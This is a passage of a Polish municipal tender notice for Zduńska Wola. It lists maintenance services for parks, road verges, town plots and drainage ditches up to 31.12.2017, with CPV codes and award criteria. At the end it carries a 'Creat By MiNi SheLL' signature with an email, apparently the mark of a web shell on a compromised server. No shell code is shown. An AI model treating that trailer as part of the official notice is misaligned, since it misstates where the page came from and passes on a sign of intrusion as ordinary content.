6.Koszenie terenów zieleni  -  minimum 9 razy w okresie od kwietnia do listopada, w zależności od warunków wzrostu trawy  (termin koszenia uzgodniony z zamawiającym),
7. Utrzymanie w czystości i porządku słupów ogłoszeniowych,
8. Pielęgnacja nasadzeń rosnących w skupinach, żywopłotach, (gazonach i rabatach jeśli wystąpią) polegająca na: odchwaszczaniu, przycinaniu, zasilaniu nawozami  -  3 razy w sezonie wegetacyjnym, podlewaniu w okresach suszy w miejscach  niedostępnych dla automatycznego podlewania,
9. Zwalczanie (chemiczne i mechaniczne) chwastów w alejkach i na powierzchniach utwardzonych,
10. Jesienne wygrabianie liści z trawników ( nie rzadziej niż 2 razy w tygodniu),
11. Wykonanie oprysków chemicznych krzewów przeciw chorobom grzybowym i szkodnikom - 2 razy w sezonie wegetacyjnym.
12. Zgłaszanie wad  systemu nawadniania powierzchniowego, usuwanie usterek wymagających naprawy bądź wymiany tryskaczy wg. potrzeb.

Wymagane roboty na terenach zlokalizowanych w północnej części Miasta  Zduńska Wola:
1. Omiatanie  ciągów pieszych - trzy razy w tygodniu; sprzątanie wiatrołomów, połamanych gałęzi, kwiatostanów i owoców drzew po wichurach niezależnie od ustalonej częstotliwości
2. Opróżnianie koszy - co drugi dzień do godziny 8 rano, malowanie koszy w terminie do dnia 1 maja, konserwacja koszy (drobne naprawy)
3. Odśnieżanie pieszo-jezdnych ciągów komunikacyjnych, dróg dojazdowych  wewnętrznych, parkingów, na szerokość  dostosowaną do ich szerokości (nie szerzej niż 2 m) nie później niż dwie  godziny od zakończenia opadów, przeciwdziałanie  śliskości, usuwanie błota pośniegowego z  wymienionych  utwardzonych  ciągów komunikacyjnych
4. Prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy, rozrzucanie kretowin itp. - codziennie w okresie od kwietnia do  listopada . Zbieranie zanieczyszczeń z terenów objętych umową w okresie zimowym - w przypadku wystąpienia zaśmiecenia terenu
5. Malowanie ławek parkowych w terminie do 1 maja, mycie zabrudzonych ławek wg potrzeb, naprawa zniszczonych elementów ławek tj. uzupełnianie brakujących śrub i desek z malowaniem (malowanie dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby)
6. Koszenie terenów zieleni - 6 razy w sezonie (terminy koszenia uzgodnione z zamawiającym)
7. Pielęgnacja  krzewów rosnących w skupieniach i żywopłotach (odchwaszczanie,  przycinanie,  zasilanie - 3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy wg potrzeb, usuwanie odrostów drzew)
8. Zwalczanie (chemiczne i mechaniczne) chwastów w alejkach i na powierzchniach  utwardzonych
9. Jesienne wygrabianie liści z trawników (nie rzadziej niż 2 razy w tygodniu)
10. Ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w poprzednim i bieżącym roku (jeżeli wystąpią nasadzenia)
11. Utrzymanie miejsc pamięci narodowej (mycie pomników, utrzymanie porządku, obsadzenia roślinami miejsc do tego przeznaczonych,  ustawianie zniczy i ułożenie  po jednej wiązance na świerku w wymienionych niżej miejscach i terminach:
11.1.	Cmentarz Katolicki: 
- Pomnik Honoraty Złotnickiej, płyta Stefana Złotnickiego - Święto Miasta i 1 listopada
- Mogiła zbiorowa + kwatera - 1września i  1 listopada
- Mogiła siostry PCK - 1września i 1 listopada
- Mogiła lotników - 1września i  1 listopada
- Mogiła Sylli i Kałużewskiego (tylko wiązanka i znicze )	- 1września i  1 listopada
11.2.	Plac Wolności:
- Płyta  Rozstrzelanym przez hitlerowców 11 listopada 1939 r.
- 1 września i 11 listopada
- Pomnik Józefa Piłsudskiego - 11 listopada
11.3.	Plac Zwycięstwa:
- Pomnik ku wiecznej pamięci Sylli i Kałużewskiego - 1 września i 11 listopada
12.	Opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych, uzupełnianie brakujących elementów - deski bale, siedziska, wymiana piasku w piaskownicach - 2 x w sezonie (w terminie ustalonym z zamawiającym),  malowanie elementów drewnianych wymagających odświeżenia
13. Przeciwdziałanie chemiczne i biologiczne przeciwko wykwitom glonów na stawach środkami chemicznymi dopuszczonymi do obrotu. Czyszczenie lustra wody przy brzegach skarp na stawach nie rzadziej niż 2 razy w tygodniu oraz czyszczenie zastawek z naniesionych śmieci w zależności od potrzeb, regulacja poziomu lustra wody (wg poleceń Zamawiającego). Jednokrotne zarybienie gatunkami roślinożernymi 200 kg narybku wg potrzeb
14. Odchwaszczanie skarp stawów i rzeki  Pichny w granicach Parku Miejskiego
15. Malowanie barierek, słupków do tablic informacyjnych - 1 raz w sezonie w terminie  uzgodnionym z zamawiającym.
16. Mycie znaków i tablic informacyjnych, konserwacja i regulacja podpór zastosowanych do zabezpieczenia  starodrzewu na terenie Parku Miejskiego (w ustaleniu z Zamawiającym).
17.Dokarmianie i opieka nad łabędziem oraz zapewnienie miejsca schronienia w okresie zimowym (przetrzymanie łabędzia w miejscu schronienia i dokarmianie go w okresie zimy do następnego sezonu, przywiezienie z miejsca zimowania na staw w następnym sezonie  wiosennym w terminie uzgodnionym z zamawiającym.
18. Ukwiecenia - w terminach ustalonych z zamawiającym bieżąca pielęgnacja kwietników, gazonów, oraz rabat kwietnych (uzupełnianie roślin, zasilanie nawozami - 6 razy w sezonie wegetacyjnym podlewanie na bieżąco).
Wymagana norma nasadzeń dla 1 kwietnika typu 120 x120 - 6 pierścieni o konstrukcji  metalowej.
1 sadzenie:
sadzonki roślin pnących typu: surfinia, pelargonia, obsadzanych w systemie
1,2,4,6 warstwa - 50 sztuk.
2 i 3  sadzenie:(trzecie sadzenie wg potrzeb):
sadzonki roślin o pędach wyprostowanych typu chryzantemy, begonie, obsadzane w systemie wszystkich warstw ok 85 sztuk.    
Pozostałe gazony obsadzanie jw. w ilości dostosowanej do wielkości gazonów
Wymagana norma nasadzeń na rabatach gruntowych: trzykrotna wymiana i uzupełnianie roślin jednorocznych rodzaju: begonia łuskowata, starzec, szałwia, żeniszek, aksamitka, bratek, godecja, niecierpek w rozstawie 20 x 20 cm (do wyboru). Przyozdabianie kwietników igliwiem świerkowo-sosnowym na okres zimowy.
19.	Wymiana i uzupełnianie tabliczek informacyjnych dotyczących zakazów , regulaminów, itp. w zależności od potrzeb.
Materiały niezbędne do realizacji zamówienia takie jak paliki, taśmy, nawozy, woda, opryski, piasek, kwiaty, znicze, stroisz, farby, deski  itp. należy wliczyć w cenę zamówienia.

Wymagane roboty na terenach zlokalizowanych w południowej części miasta  Zduńska Wola
Wykonawca zobowiązuje się do świadczenia na rzecz Zamawiającego następujących usług  zlokalizowanych w południowej części miasta  Zduńska Wola:
1)	omiatanie alejek parkowych - 2 razy w tygodniu;
2)	opróżnianie koszy - dwa razy w tygodniu do godziny 8 rano, malowanie koszy w terminie do 1 maja, konserwacja koszy - drobne naprawy;
3)	odśnieżanie  alejek parkowych na szerokość dostosowaną do ich szerokości (nie szerzej niż 2 m) nie później niż dwie godziny od zakończenia opadów; przeciwdziałanie ich śliskości,  usuwanie błota pośniegowego z utwardzonych  ciągów komunikacyjnych;
4)	prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy, rozrzucanie kretowin itp. - dwa razy w tygodniu od kwietnia do listopada. Zbieranie śmieci z terenów objętych umową w pozostałym okresie trwania umowy - w przypadku wystąpienia zaśmiecenia terenu - sprzątanie wiatrołomów, połamanych gałęzi, kwiatostanów i owoców drzew po wichurach niezależnie od ustalonej częstotliwości.
5)	malowanie ławek parkowych w terminie do 1 maja;  mycie zabrudzonych ławek wg potrzeb; naprawa zniszczonych elementów ławek tj. uzupełnianie brakujących śrub i desek z malowaniem (malowanie dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby);
6)	koszenie terenów zieleni -  5 razy (termin koszenia uzgodniony  z zamawiającym);
7)	pielęgnacja  krzewów rosnących w  skupinach i żywopłotach (odchwaszczanie, przycinanie, zasilanie  -  3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy; usuwanie odrostów drzew  
8)	zwalczanie (chemiczne i mechaniczne) chwastów w alejkach i na powierzchniach utwardzonych;
9)	jesienne wygrabianie liści z trawników (nie rzadziej niż 1 raz w tygodniu);
10)	ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w poprzednim i bieżącym roku (jeżeli wystąpią nasadzenia);
11)	opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych; uzupełnianie brakujących elementów - deski bale; siedziska; wymiana piasku  w piaskownicach - 2 x w sezonie (w terminie ustalonym z zamawiającym), malowanie elementów drewnianych wymagających odświeżenia;
12)	mycie znaków i tablic informacyjnych (w zależności od potrzeb);
13)	malowanie słupków do tablic  informacyjnych  w terminie  do 1 maja.

Wymagane roboty na terenach przyległych do  zbiornika Kępina:  
1.	koszenie terenów przyległych do zbiornika Kępina - dwa razy w sezonie bez wywozu trawy  (w terminie uzgodnionym z zamawiającym),
2.	malowanie ławek - 1 raz w sezonie (w terminie uzgodnionym z zamawiającym),
3.	prace porządkowe różne: naprawa ławek, miejsc na ogniska (stoły; ławy) zbieranie papierów, zbieranie skoszonej przez Koło wędkarskie trzciny z wywozem (w terminie uzgodnionym z zamawiającym),
4.	kontrola i opróżnianie pojemników na odpady  1 raz w tygodniu, w miesiącach marzec -  listopad , 2  razy w miesiącu w pozostałym terminie,
5.	sprzątanie palenisk (w/g potrzeb), palenie pozostawionych gałęzi,
6.	mechaniczne usuwanie przerostów ze schodów kamiennych stanowiących umocnienie skarpy zbiornika, (2 razy w sezonie),
7.	bieżące  oczyszczanie wlotu i wylotu wody z Kępiny,
8.	Wymiana pojemników na odpady dostawienie ławek  (w uzgodnieniu z zamawiającym)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 90.60.00.00-3, 98.35.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych na terenie miasta Zduńska Wola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części II zamówienia Wykonawca zobowiązuje się do świadczenia na rzecz Zamawiającego usług polegających na utrzymaniu zieleni (m.in. koszenie zieleńcy, trawników, przycinanie żywopłotów, pielęgnacja krzewów i rabat - 81974m2) oraz sprzątaniu pasów drogowych dróg gminnych w obrębie granic miasta Zduńska Wola (m.in. omiatanie, zbieranie zanieczyszczeń, odśnieżane - 58863m2) w ramach ryczałtu zgodnie ze standardem oraz wykazem pasów drogowych określonym w części II SIWZ - Zadnie II A.
Wykonywanie przez Wykonawcę dodatkowych czynności (m.in. wykaszanie i wygrabianie liści - 1174182m2: szczegółowy zakres określony w część II SIWZ - Zadanie II B) oraz innych dodatkowych czynności (m.in. sadzenie krzewów, podlewanie roślin, malowanie powierzchni - 618561m2: szczegółowy zakres określony w część II SIWZ - Zadanie II C) w zakresie utrzymania zieleni oraz sprzątania pasów drogowych dróg gminnych na rzecz Zamawiającego odbywać się będzie na podstawie zleceń jednostkowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 90.61.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utrzymanie działek miejskich poza terenami urządzonymi i pasami dróg oraz usługi dla mieszkańców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III A
Zadanie w ramach ryczałtu obejmuje bieżące utrzymanie zieleni poprzez 3 krotne koszenie działek miejskich (ok. 552 042 m2) oraz utrzymanie czystości na działkach miejskich (ok. 47 930 m2) poza terenami urządzonymi (takimi jak parki, skwery, place zabaw i pasy dróg) należących do miasta Zduńska Wola.

Zadanie III B
Dodatkowe  czynności, które mogą wystąpić do wykonania na zlecenie Zamawiającego, w tym:
- Koszenie działek miejskich - 40000m2;
- Uporządkowanie i wyrównanie terenów miejskich (wycięcie samosiejek z karczowaniem do 10 lat, a w przypadku drzew pow.  10 lat, podcięcie i uformowanie koron) - 40000m2;
- Usunięcie darni i przerostów z chodników i parkingów - 10000m2;
- Likwidacja śliskości ciągów pieszych wraz z materiałem uszorstniającym (mieszanka piasku i soli 4%) - 10000m2;
- Wygrabianie liści wraz z wywozem - 10000m2;
- Koszt ręcznego zbierania zanieczyszczeń z  powierzchni utwardzonych i nieutwardzonych - 40000m2;
- Omiatanie powierzchni utwardzonej - 10000m2;
- Wywóz  odpadów innych niż organiczne - 60m3.

Zadanie III C
Zadanie w ramach ryczałtu obejmuje zakres prac związanych z usługami dla mieszkańców (utrzymanie tablic ogłoszeniowych, flagowanie, obsługa imprez plenerowych) na terenie miasta Zduńska Wola.

W zakres utrzymania słupów i tablic informacyjno - ogłoszeniowych znajdujących się na terenie miasta Zduńska Wola wchodzi:
- dokładne oczyszczanie terenu wokół słupów i tablic informacyjno - ogłoszeniowych (koszenie trawy, usuwanie chwastów, usuwanie śniegu, zalodzeń, itp. - w odległości 1 metra od nich),
- niedopuszczanie do naklejania nadmiernej grubości warstw plakatów, maksymalna grubość nawarstwienia nie może przekraczać 0,5 cm,
- zbieranie odpadów i śmieci powstałych w wyniku plakatowania słupów i tablic informacyjno - ogłoszeniowych, usuwanie graffiti z powierzchni nie plakatowanych,
- utrzymanie w czystości słupów i tablic,
- malowanie minimum raz w roku elementów słupów i tablic poza częścią ekspozycyjną w kolorystyce i zakresie uzgodnionym z Zamawiającym.
- wykonawca zobowiązuje się do przeprowadzenia na własny koszt drobnych napraw eksploatacyjnych związanych z właściwym utrzymaniem stanu technicznego słupów i tablic (w tym wymiany płyty nienadającej się do użytku w tablicach  informacyjno - ogłoszeniowych, wskazanej przez Zamawiającego podczas trwania umowy).
Zadanie na zlecenie Zamawiającego obejmuje zakres prac:
1. Dekorowanie ulic miasta, budynków  jednostek administracyjnych, ustawianie stojaków z flagami z okazji świąt państwowych, patriotycznych oraz lokalnych;
2. Dowóz ekologicznych kabin TOI-TOI w związku z imprezami plenerowymi i zabranie po zakończeniu wraz z obsługą podczas imprezy;             
3. Dowóz stojaków z workami na odpady w związku z imprezami plenerowymi i zabranie po zakończeniu wraz z obsługą podczas imprezy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 77.30.00.00-3, 98.35.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Utrzymanie drożności systemu powierzchniowego odwodnienia Miasta Zduńska Wola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obejmuje utrzymanie drożności systemu powierzchniowego odwodnienia Miasta Zduńska Wola, poprzez podejmowanie czynności związanych z bieżącym utrzymaniem i oczyszczaniem wybranych odcinków (zleconych przez Zamawiającego) rowów melioracyjnych (ok. 24 000 mb.), rowów przydrożnych (ok. 40 000 mb.) rowów ujętych w ewidencji gruntów jako drogi , użytki rolne, łąki itp., będących własnością Miasta Zduńska Wola (ok. 5 000 mb.) oraz odcinków rzeki będących w utrzymaniu Miasta Zduńska Wola (ok. 2 000 mb.).
Przez bieżące utrzymanie i oczyszczaniem rowów rozumie się:
- utrzymanie drożności rowu;
- utrzymanie drożności przepustu;
- remonty i prace mające na celu poprawę bezpieczeństwa w obszarze oddziaływania urządzenia wodnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.64.00.00-5, 98.35.00.00-1, 77.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com